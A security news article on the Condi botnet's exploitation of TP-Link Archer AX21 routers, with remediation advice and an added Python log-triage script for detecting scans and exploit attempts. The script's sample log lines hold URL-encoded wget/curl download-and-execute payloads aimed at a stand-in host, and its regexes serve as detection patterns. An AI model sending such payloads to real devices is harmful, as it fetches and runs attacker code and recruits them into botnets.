TP-Link Archer AX21 router vulnerability exposes devices to recruitment into a DDoS botnet
Take action: if you use a TP-Link Archer AX21, assume it may already have been compromised. Back up your configuration, factory-reset the router, and apply the latest firmware update. Review the backed-up settings (DNS servers, remote management, admin credentials) before restoring them rather than re-importing them blindly, since the configuration of a compromised device may carry the attacker's changes.
Security researchers have discovered a new Distributed Denial of Service (DDoS) botnet, named Condi, that exploits a critical vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers.
Condi's operators rent out the botnet as a DDoS-for-hire service and, in parallel, sell the botnet's source code and related tooling to other parties looking for quick financial gains.
TP-Link has released a firmware update that fixes the vulnerability. Owners of Archer AX21 routers are strongly advised to apply it immediately to protect their devices.
The flaw, originally reported through the Zero Day Initiative (ZDI), has since been confirmed by independent researchers. Unpatched Archer AX21 routers can be compromised by malicious actors and enrolled as part of their botnet infrastructure.
How is the Condi botnet built?
- Condi builds the botnet by scanning the internet for public IP addresses with TCP port 80 or 8080 open, that is, hosts exposing a web interface. For each hit it sends a predefined exploitation request that makes the target download and execute a remote shell script. A router whose web management interface is reachable from the WAN side is therefore directly in the scanner's path. Some spread has also been observed through an exposed Android Debug Bridge (ADB) port (TCP/5555).
- Once on a device, the Condi malware attempts to kill competing malware processes and any older copies of itself. It has no persistence mechanism, so it does not survive a reboot; to compensate, it disables the device's reboot and shutdown functions so that the infection is not cleared by a restart. The flip side is that a power-cycle does remove the running malware, but an unpatched router that is still exposed will simply be reinfected on the next scan.
- Signs of a possible Condi infection include the device overheating, network disruptions, unexplained changes to network settings, and unexpected resets of the admin password. If any of these is observed, factory-reset the device and apply the available firmware update immediately; a reset alone does not remove the vulnerability, so the update is what prevents reinfection.
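The two infection stages described above, scanning for exposed ports and then delivering a download-and-execute request, leave traces in ordinary router-side logs. The script below is an added example, not code from the original article or from the researchers who analysed Condi. It assumes two constructed log sources: netfilter LOG lines (KEY=VALUE pairs, as written by the Linux firewall on the router or an upstream gateway, with IN=<iface> marking the ingress interface) and HTTP access-log lines in Combined Log Format from the router's web UI. The interface name eth0, the endpoint path /cgi-bin/example, and the payload itself are made up for the example: the payload is a generic Mirai-style "fetch a script and run it" fragment, not Condi's actual request.

```python
"""Triage of router-side logs for the scanning and exploitation stages.

Added example, not the article's or the researchers' code. Constructed inputs:
  * netfilter LOG lines (KEY=VALUE pairs; IN=<iface> is the ingress interface);
  * HTTP access-log lines in Combined Log Format from the router's web UI.
The payload pattern is a generic download-and-execute shell fragment, not the
actual Condi request; the endpoint path and addresses are made up.
"""
import re
from urllib.parse import unquote

# Ports the article says the botnet scans for: web management UI and ADB.
WATCHED_PORTS = {80: "http-admin", 8080: "http-admin-alt", 5555: "adb"}

_KV_RE = re.compile(r"(\w+)=(\S*)")
_ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A downloader followed by execution: the shape of "download and execute a
# remote shell script" on a busybox-class device.
_DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.IGNORECASE)
_EXEC_RE = re.compile(
    r"(?:\||;|&&|`)\s*(?:sh|bash|ash)\b|\bchmod\s+(?:\+x|[0-7]{3,4})\b", re.IGNORECASE
)


def parse_netfilter(line):
    """Return the KEY=VALUE fields of a netfilter LOG line, or None if it is not one."""
    fields = dict(_KV_RE.findall(line))
    return fields if "SRC" in fields and "DPT" in fields else None


def exposed_service_hits(lines, wan_iface="eth0"):
    """Inbound TCP connections on the WAN interface to a watched port.

    Returns (src_ip, dst_port, label) tuples. LAN-side hits are ignored:
    local clients legitimately reach the admin UI; internet hosts must not.
    """
    hits = []
    for line in lines:
        f = parse_netfilter(line)
        if not f or f.get("IN") != wan_iface or f.get("PROTO") != "TCP":
            continue
        dpt = int(f["DPT"])
        if dpt in WATCHED_PORTS:
            hits.append((f["SRC"], dpt, WATCHED_PORTS[dpt]))
    return hits


def is_download_exec(text):
    """True if a (possibly URL-encoded) request fragment fetches and runs code."""
    decoded = unquote(unquote(text))  # second pass catches double encoding
    return bool(_DOWNLOADER_RE.search(decoded) and _EXEC_RE.search(decoded))


def suspicious_requests(lines):
    """(client_ip, decoded_target) for access-log entries carrying such a payload."""
    out = []
    for line in lines:
        m = _ACCESS_RE.match(line)
        if m and is_download_exec(m["target"]):
            out.append((m["src"], unquote(unquote(m["target"]))))
    return out


# Constructed sample data (RFC 5737 documentation addresses), not real logs.
SAMPLE_FIREWALL_LINES = [
    "Jun 20 10:00:01 router kernel: WAN-IN IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 "
    "SRC=203.0.113.5 DST=198.51.100.20 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1 DF PROTO=TCP SPT=41222 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0",
    "Jun 20 10:00:01 router kernel: WAN-IN IN=eth0 OUT= SRC=203.0.113.5 DST=198.51.100.20 LEN=60 PROTO=TCP SPT=41223 DPT=8080 SYN URGP=0",
    "Jun 20 10:00:03 router kernel: WAN-IN IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.20 LEN=60 PROTO=TCP SPT=51000 DPT=5555 SYN URGP=0",
    "Jun 20 10:00:05 router kernel: LAN-IN IN=br0 OUT= SRC=192.168.0.23 DST=192.168.0.1 LEN=60 PROTO=TCP SPT=50100 DPT=80 SYN URGP=0",
    "Jun 20 10:00:06 router kernel: WAN-IN IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.20 LEN=60 PROTO=UDP SPT=53 DPT=5555",
    "Jun 20 10:00:07 router kernel: WAN-IN IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.20 LEN=60 PROTO=TCP SPT=51001 DPT=443 SYN URGP=0",
]
SAMPLE_ACCESS_LINES = [
    '203.0.113.5 - - [20/Jun/2023:10:00:02 +0000] "GET /cgi-bin/example?q=%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20-%7Csh HTTP/1.1" 200 512 "-" "-"',
    '192.168.0.23 - - [20/Jun/2023:10:01:00 +0000] "GET /webpages/index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Jun/2023:10:02:00 +0000] "POST /cgi-bin/example?q=%60curl%20198.51.100.7%2Fb%20-o%20%2Ftmp%2Fb%3Bchmod%20%2Bx%20%2Ftmp%2Fb%3B%2Ftmp%2Fb%60 HTTP/1.1" 500 0 "-" "-"',
]

if __name__ == "__main__":
    for src, port, label in exposed_service_hits(SAMPLE_FIREWALL_LINES):
        print(f"WAN scan hit: {src} -> tcp/{port} ({label})")
    for src, target in suspicious_requests(SAMPLE_ACCESS_LINES):
        print(f"download-and-execute payload from {src}: {target}")
```

Any WAN-side hit on the watched ports means the management interface or ADB is reachable from the internet and should be closed regardless of whether an exploit followed; a matching access-log entry from the same source is the exploitation attempt and means the device should be treated as compromised and reset and updated as described above.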